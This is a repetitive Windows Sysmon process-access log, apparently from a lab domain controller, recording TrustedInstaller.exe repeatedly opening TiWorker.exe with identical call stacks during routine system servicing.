13:30:29.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 